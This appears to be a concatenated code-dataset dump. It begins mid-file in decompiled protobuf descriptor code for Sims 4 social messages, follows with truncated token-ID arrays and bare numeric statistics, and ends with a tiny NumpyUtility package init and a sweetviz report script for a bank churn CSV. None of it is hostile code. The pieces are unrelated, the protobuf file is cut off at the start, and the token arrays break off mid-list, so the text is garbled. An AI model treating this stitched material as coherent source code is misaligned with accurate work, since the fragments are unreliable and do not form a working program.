full_name='EA.Sims4.Network.SocialControlMessage.opcode', index=0, number=1, type=14, cpp_type=8, label=2, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='subop', full_name='EA.Sims4.Network.SocialControlMessage.subop', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='transactionId', full_name='EA.Sims4.Network.SocialControlMessage.transactionId', index=2, number=3, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='result', full_name='EA.Sims4.Network.SocialControlMessage.result', index=3, number=100, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='getwallcommentsmsg', full_name='EA.Sims4.Network.SocialControlMessage.getwallcommentsmsg', index=4, number=4, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='postwallcommentmsg', full_name='EA.Sims4.Network.SocialControlMessage.postwallcommentmsg', index=5, number=5, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='deletewallcommentmsg', full_name='EA.Sims4.Network.SocialControlMessage.deletewallcommentmsg', index=6, number=6, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='friendmsg', full_name='EA.Sims4.Network.SocialControlMessage.friendmsg', index=7, number=7, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='genericresponse', full_name='EA.Sims4.Network.SocialControlMessage.genericresponse', index=8, number=8, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='playerinfo', full_name='EA.Sims4.Network.SocialControlMessage.playerinfo', index=9, number=9, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='feedsubmsg', full_name='EA.Sims4.Network.SocialControlMessage.feedsubmsg', index=10, number=10, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='searchresultmsg', full_name='EA.Sims4.Network.SocialControlMessage.searchresultmsg', index=11, number=11, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='inviteresponsemsg', full_name='EA.Sims4.Network.SocialControlMessage.inviteresponsemsg', index=12, number=12, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='originerror', full_name='EA.Sims4.Network.SocialControlMessage.originerror', index=13, number=13, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialcassandratest', full_name='EA.Sims4.Network.SocialControlMessage.socialcassandratest', index=14, number=14, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialfriendlistrequestmsg', full_name='EA.Sims4.Network.SocialControlMessage.socialfriendlistrequestmsg', index=15, number=15, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialrequestnucleusidfrompersona', full_name='EA.Sims4.Network.SocialControlMessage.socialrequestnucleusidfrompersona', index=16, number=16, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialnucleusidfrompersonaresponse', full_name='EA.Sims4.Network.SocialControlMessage.socialnucleusidfrompersonaresponse', index=17, number=17, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialexchangemessage', full_name='EA.Sims4.Network.SocialControlMessage.socialexchangemessage', index=18, number=18, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='socialrequestfeedwallmessage', full_name='EA.Sims4.Network.SocialControlMessage.socialrequestfeedwallmessage', index=19, number=19, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='stat_tickers', full_name='EA.Sims4.Network.SocialControlMessage.stat_tickers', index=20, number=21, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='comment_petition_msg', full_name='EA.Sims4.Network.SocialControlMessage.comment_petition_msg', index=21, number=22, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='feedremovalmsg', full_name='EA.Sims4.Network.SocialControlMessage.feedremovalmsg', index=22, number=23, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='bio_petition_msg', full_name='EA.Sims4.Network.SocialControlMessage.bio_petition_msg', index=23, number=24, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='fb_event_msg', full_name='EA.Sims4.Network.SocialControlMessage.fb_event_msg', index=24, number=25, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='requestfollowers_msg', full_name='EA.Sims4.Network.SocialControlMessage.requestfollowers_msg', index=25, number=26, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='responsefollowers_msg', full_name='EA.Sims4.Network.SocialControlMessage.responsefollowers_msg', index=26, number=27, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='requestignorelist_msg', full_name='EA.Sims4.Network.SocialControlMessage.requestignorelist_msg', index=27, number=28, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='response_player_info_list_msg', full_name='EA.Sims4.Network.SocialControlMessage.response_player_info_list_msg', index=28, number=29, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='player_identification_list_msg', full_name='EA.Sims4.Network.SocialControlMessage.player_identification_list_msg', index=29, number=30, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='candidate_msg', full_name='EA.Sims4.Network.SocialControlMessage.candidate_msg', index=30, number=31, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='evaluation_results_msg', full_name='EA.Sims4.Network.SocialControlMessage.evaluation_results_msg', index=31, number=32, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='cg_update_msg', full_name='EA.Sims4.Network.SocialControlMessage.cg_update_msg', index=32, number=33, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=3394, serialized_end=5713) _SOCIALINVALIDATEMSG = descriptor.Descriptor(name='SocialInvalidateMsg', full_name='EA.Sims4.Network.SocialInvalidateMsg', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='cache_index', full_name='EA.Sims4.Network.SocialInvalidateMsg.cache_index', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='key', full_name='EA.Sims4.Network.SocialInvalidateMsg.key', index=1, number=2, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5715, serialized_end=5770) _SOCIALCONTROLQUEUEBROADCASTMESSAGE = descriptor.Descriptor(name='SocialControlQueueBroadcastMessage', full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='control', full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.control', index=0, number=1, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='friendIds', full_name='EA.Sims4.Network.SocialControlQueueBroadcastMessage.friendIds', index=1, number=3, type=4, cpp_type=4, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5772, serialized_end=5888) _LIFEEVENTMESSAGE = descriptor.Descriptor(name='LifeEventMessage', full_name='EA.Sims4.Network.LifeEventMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='type', full_name='EA.Sims4.Network.LifeEventMessage.type', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='sim_ids', full_name='EA.Sims4.Network.LifeEventMessage.sim_ids', index=1, number=2, type=6, cpp_type=4, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x10\x01')))], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5890, serialized_end=5943) _SOCIALFACEBOOKEVENTMESSAGE = descriptor.Descriptor(name='SocialFacebookEventMessage', full_name='EA.Sims4.Network.SocialFacebookEventMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='objectId', full_name='EA.Sims4.Network.SocialFacebookEventMessage.objectId', index=0, number=1, type=9, cpp_type=9, label=2, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='accessToken', full_name='EA.Sims4.Network.SocialFacebookEventMessage.accessToken', index=1, number=2, type=9, cpp_type=9, label=2, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='guid', full_name='EA.Sims4.Network.SocialFacebookEventMessage.guid', index=2, number=3, type=9, cpp_type=9, label=2, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=5945, serialized_end=6026) _SOCIALCANDIDATESTATISTICSUBMESSAGE = descriptor.Descriptor(name='SocialCandidateStatisticSubmessage', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='remote_id', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.remote_id', index=0, number=1, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='views_count', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.views_count', index=1, number=2, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='wins_count', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.wins_count', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='platform', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.platform', index=3, number=4, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='category', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.category', index=4, number=5, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='was_reported', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.was_reported', index=5, number=6, type=8, cpp_type=7, label=1, has_default_value=False, default_value=False, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=(descriptor._ParseOptions(descriptor_pb2.FieldOptions(), '\x18\x01'))), descriptor.FieldDescriptor(name='expires_epoch_sec', full_name='EA.Sims4.Network.SocialCandidateStatisticSubmessage.expires_epoch_sec', index=6, number=7, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6029, serialized_end=6214) _SOCIALCANDIDATESMESSAGE = descriptor.Descriptor(name='SocialCandidatesMessage', full_name='EA.Sims4.Network.SocialCandidatesMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='count', full_name='EA.Sims4.Network.SocialCandidatesMessage.count', index=0, number=1, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='platform_restriction', full_name='EA.Sims4.Network.SocialCandidatesMessage.platform_restriction', index=1, number=2, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='category_restriction', full_name='EA.Sims4.Network.SocialCandidatesMessage.category_restriction', index=2, number=3, type=13, cpp_type=3, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='challenge', full_name='EA.Sims4.Network.SocialCandidatesMessage.challenge', index=3, number=4, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='digest', full_name='EA.Sims4.Network.SocialCandidatesMessage.digest', index=4, number=5, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='candidates', full_name='EA.Sims4.Network.SocialCandidatesMessage.candidates', index=5, number=6, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='expire_epoch_secs', full_name='EA.Sims4.Network.SocialCandidatesMessage.expire_epoch_secs', index=6, number=7, type=4, cpp_type=4, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6217, serialized_end=6453) _SOCIALEVALUATIONRESULTSMESSAGE = descriptor.Descriptor(name='SocialEvaluationResultsMessage', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='winner_ids', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.winner_ids', index=0, number=1, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='loser_ids', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.loser_ids', index=1, number=2, type=9, cpp_type=9, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='digest', full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.digest', index=2, number=3, type=12, cpp_type=9, label=1, has_default_value=False, default_value=b'', message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6455, serialized_end=6542) _SOCIALCGDIGESTMESSAGE = descriptor.Descriptor(name='SocialCGDigestMessage', full_name='EA.Sims4.Network.SocialCGDigestMessage', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ descriptor.FieldDescriptor(name='challenge', full_name='EA.Sims4.Network.SocialCGDigestMessage.challenge', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=((b'').decode('utf-8')), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), descriptor.FieldDescriptor(name='candidates', full_name='EA.Sims4.Network.SocialCGDigestMessage.candidates', index=1, number=2, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None)], extensions=[], nested_types=[], enum_types=[], options=None, is_extendable=False, extension_ranges=[], serialized_start=6544, serialized_end=6660) _SOCIALGENERICRESPONSE.fields_by_name['msg_type'].enum_type = Consts_pb2._SOCIALOPTYPES _SOCIALPLAYERINFOLIST_PLAYERINFO.fields_by_name['presence'].enum_type = Consts_pb2._ONLINEPRESENCESTATUS _SOCIALPLAYERINFOLIST_PLAYERINFO.containing_type = _SOCIALPLAYERINFOLIST _SOCIALPLAYERINFOLIST.fields_by_name['players'].message_type = _SOCIALPLAYERINFOLIST_PLAYERINFO _SOCIALSEARCHMSG.fields_by_name['search_results'].message_type = Localization_pb2._LOCALIZEDSTRINGTOKEN _SOCIALCASSANDRATEST.fields_by_name['opcode'].enum_type = Consts_pb2._CASSANDRATESTCODE _SOCIALEXCHANGEMESSAGE.fields_by_name['envelope'].message_type = Exchange_pb2._EXCHANGESOCIALENVELOPE _SOCIALFEEDITEMMESSAGE.fields_by_name['feed_type'].enum_type = _SOCIALFEEDITEMTYPE _SOCIALFEEDITEMMESSAGE.fields_by_name['metadata'].message_type = Exchange_pb2._TRAYMETADATA _SOCIALFEEDITEMMESSAGE.fields_by_name['followers_blob'].message_type = _SOCIALFOLLOWERSMESSAGE _SOCIALGETWALLCOMMENTSMESSAGE.fields_by_name['messages'].message_type = _SOCIALWALLCOMMENTMESSAGE _SOCIALPOSTWALLCOMMENTMESSAGE.fields_by_name['message'].message_type = _SOCIALWALLCOMMENTMESSAGE _SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['messages'].message_type = _SOCIALFEEDITEMMESSAGE _SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['unserialized_messages'].message_type = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO.containing_type = _SOCIALGETPLAYERINFOLISTMESSAGE _SOCIALGETPLAYERINFOLISTMESSAGE.fields_by_name['player_info_list'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO _SOCIALCONTROLMESSAGE.fields_by_name['opcode'].enum_type = Consts_pb2._SOCIALOPTYPES _SOCIALCONTROLMESSAGE.fields_by_name['subop'].enum_type = Consts_pb2._SOCIALOPTYPES _SOCIALCONTROLMESSAGE.fields_by_name['getwallcommentsmsg'].message_type = _SOCIALGETWALLCOMMENTSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['postwallcommentmsg'].message_type = _SOCIALPOSTWALLCOMMENTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['deletewallcommentmsg'].message_type = _SOCIALDELETEWALLCOMMENTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['friendmsg'].message_type = _SOCIALFRIENDMSG _SOCIALCONTROLMESSAGE.fields_by_name['genericresponse'].message_type = _SOCIALGENERICRESPONSE _SOCIALCONTROLMESSAGE.fields_by_name['playerinfo'].message_type = _SOCIALPLAYERINFOLIST _SOCIALCONTROLMESSAGE.fields_by_name['feedsubmsg'].message_type = Exchange_pb2._SOCIALFEEDSUBMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['searchresultmsg'].message_type = _SOCIALSEARCHMSG _SOCIALCONTROLMESSAGE.fields_by_name['inviteresponsemsg'].message_type = _SOCIALINVITERESPONSEMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['originerror'].message_type = _ORIGINERRORMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['socialcassandratest'].message_type = _SOCIALCASSANDRATEST _SOCIALCONTROLMESSAGE.fields_by_name['socialfriendlistrequestmsg'].message_type = _SOCIALFRIENDLISTREQUESTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['socialrequestnucleusidfrompersona'].message_type = _SOCIALREQUESTNUCLEUSIDFROMPERSONA _SOCIALCONTROLMESSAGE.fields_by_name['socialnucleusidfrompersonaresponse'].message_type = _SOCIALNUCLEUSIDFROMPERSONARESPONSE _SOCIALCONTROLMESSAGE.fields_by_name['socialexchangemessage'].message_type = _SOCIALEXCHANGEMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['socialrequestfeedwallmessage'].message_type = _SOCIALREQUESTFEEDWALLMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['stat_tickers'].message_type = Exchange_pb2._EXCHANGESTATTICKERMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['comment_petition_msg'].message_type = _SOCIALCOMMENTPETITIONMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['feedremovalmsg'].message_type = _SOCIALFEEDREMOVALMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['bio_petition_msg'].message_type = _SOCIALBIOPETITIONMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['fb_event_msg'].message_type = _SOCIALFACEBOOKEVENTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['requestfollowers_msg'].message_type = _SOCIALREQUESTFOLLOWERSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['responsefollowers_msg'].message_type = Exchange_pb2._SOCIALRESPONSEFOLLOWERSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['requestignorelist_msg'].message_type = _SOCIALREQUESTIGNORELISTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['response_player_info_list_msg'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['player_identification_list_msg'].message_type = Exchange_pb2._SERVERPLAYERIDENTIFICATIONLISTMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['candidate_msg'].message_type = _SOCIALCANDIDATESMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['evaluation_results_msg'].message_type = _SOCIALEVALUATIONRESULTSMESSAGE _SOCIALCONTROLMESSAGE.fields_by_name['cg_update_msg'].message_type = Exchange_pb2._SOCIALCGUPDATEMESSAGE _SOCIALCONTROLQUEUEBROADCASTMESSAGE.fields_by_name['control'].message_type = _SOCIALCONTROLMESSAGE _SOCIALCANDIDATESMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE _SOCIALCGDIGESTMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE DESCRIPTOR.message_types_by_name['SocialFriendMsg'] = _SOCIALFRIENDMSG DESCRIPTOR.message_types_by_name['SocialPersonaResponseMsg'] = _SOCIALPERSONARESPONSEMSG DESCRIPTOR.message_types_by_name['SocialGenericResponse'] = _SOCIALGENERICRESPONSE DESCRIPTOR.message_types_by_name['SocialPlayerInfoList'] = _SOCIALPLAYERINFOLIST DESCRIPTOR.message_types_by_name['SocialSearchMsg'] = _SOCIALSEARCHMSG DESCRIPTOR.message_types_by_name['OriginErrorMessage'] = _ORIGINERRORMESSAGE DESCRIPTOR.message_types_by_name['SocialInviteResponseMessage'] = _SOCIALINVITERESPONSEMESSAGE DESCRIPTOR.message_types_by_name['SocialCassandraTest'] = _SOCIALCASSANDRATEST DESCRIPTOR.message_types_by_name['SocialFriendListRequestMessage'] = _SOCIALFRIENDLISTREQUESTMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestNucleusIdFromPersona'] = _SOCIALREQUESTNUCLEUSIDFROMPERSONA DESCRIPTOR.message_types_by_name['SocialNucleusIdFromPersonaResponse'] = _SOCIALNUCLEUSIDFROMPERSONARESPONSE DESCRIPTOR.message_types_by_name['SocialExchangeMessage'] = _SOCIALEXCHANGEMESSAGE DESCRIPTOR.message_types_by_name['SocialFollowersMessage'] = _SOCIALFOLLOWERSMESSAGE DESCRIPTOR.message_types_by_name['SocialFeedItemMessage'] = _SOCIALFEEDITEMMESSAGE DESCRIPTOR.message_types_by_name['SocialFeedItemUnserializedMessage'] = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE DESCRIPTOR.message_types_by_name['SocialWallCommentMessage'] = _SOCIALWALLCOMMENTMESSAGE DESCRIPTOR.message_types_by_name['SocialGetWallCommentsMessage'] = _SOCIALGETWALLCOMMENTSMESSAGE DESCRIPTOR.message_types_by_name['SocialPostWallCommentMessage'] = _SOCIALPOSTWALLCOMMENTMESSAGE DESCRIPTOR.message_types_by_name['SocialDeleteWallCommentMessage'] = _SOCIALDELETEWALLCOMMENTMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestFeedWallMessage'] = _SOCIALREQUESTFEEDWALLMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestFollowersMessage'] = _SOCIALREQUESTFOLLOWERSMESSAGE DESCRIPTOR.message_types_by_name['SocialRequestIgnoreListMessage'] = _SOCIALREQUESTIGNORELISTMESSAGE DESCRIPTOR.message_types_by_name['SocialGetPlayerInfoListMessage'] = _SOCIALGETPLAYERINFOLISTMESSAGE DESCRIPTOR.message_types_by_name['SocialCommentPetitionMessage'] = _SOCIALCOMMENTPETITIONMESSAGE DESCRIPTOR.message_types_by_name['SocialBioPetitionMessage'] = _SOCIALBIOPETITIONMESSAGE DESCRIPTOR.message_types_by_name['SocialFeedRemovalMessage'] = _SOCIALFEEDREMOVALMESSAGE DESCRIPTOR.message_types_by_name['SocialControlMessage'] = _SOCIALCONTROLMESSAGE DESCRIPTOR.message_types_by_name['SocialInvalidateMsg'] = _SOCIALINVALIDATEMSG DESCRIPTOR.message_types_by_name['SocialControlQueueBroadcastMessage'] = _SOCIALCONTROLQUEUEBROADCASTMESSAGE DESCRIPTOR.message_types_by_name['LifeEventMessage'] = _LIFEEVENTMESSAGE DESCRIPTOR.message_types_by_name['SocialFacebookEventMessage'] = _SOCIALFACEBOOKEVENTMESSAGE DESCRIPTOR.message_types_by_name['SocialCandidateStatisticSubmessage'] = _SOCIALCANDIDATESTATISTICSUBMESSAGE DESCRIPTOR.message_types_by_name['SocialCandidatesMessage'] = _SOCIALCANDIDATESMESSAGE DESCRIPTOR.message_types_by_name['SocialEvaluationResultsMessage'] = _SOCIALEVALUATIONRESULTSMESSAGE DESCRIPTOR.message_types_by_name['SocialCGDigestMessage'] = _SOCIALCGDIGESTMESSAGE
[ 2, 34318, 2349, 21, 2196, 513, 13, 22, 13, 19, 198, 2, 11361, 18022, 8189, 513, 13, 22, 357, 2091, 5824, 8, 198, 2, 4280, 3361, 3902, 422, 25, 11361, 513, 13, 22, 13, 24, 357, 31499, 14, 85, 18, 13, 22, 13, 24, 25, 1485, 66,...
2.38918
39,316
__all__ = ["NumpyUtility"] from .NumpyUtility import *
[ 834, 439, 834, 796, 14631, 45, 32152, 18274, 879, 8973, 198, 198, 6738, 764, 45, 32152, 18274, 879, 1330, 1635, 198 ]
2.666667
21
import sweetviz import pandas as pd if __name__ == '__main__': df = pd.read_csv("BankChurners_clean.csv") report = sweetviz.analyze(df, "Attrition_Flag") report.show_html()
